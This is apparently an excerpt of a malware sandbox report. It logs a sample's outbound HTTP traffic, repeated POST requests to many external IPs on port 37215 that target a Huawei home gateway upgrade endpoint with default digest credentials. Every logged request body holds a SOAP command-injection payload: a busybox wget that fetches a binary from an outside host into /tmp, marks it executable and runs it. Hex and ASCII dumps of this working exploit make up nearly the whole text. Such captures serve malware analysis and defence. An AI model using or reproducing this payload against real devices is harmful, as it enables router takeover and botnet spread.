                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5192.168.2.154270041.233.158.3737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731332064 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6192.168.2.153983241.171.185.8137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731352091 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            7192.168.2.155314041.147.245.6037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731357098 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            8192.168.2.155709841.157.30.7137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731359959 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            9192.168.2.155813641.17.40.11837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731381893 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10192.168.2.155227241.217.17.19837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731420994 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11192.168.2.154101841.30.180.6337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731473923 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12192.168.2.155509441.250.39.23837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731475115 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13192.168.2.155131041.168.222.22537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731498003 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14192.168.2.154137441.108.29.12037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.731517076 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 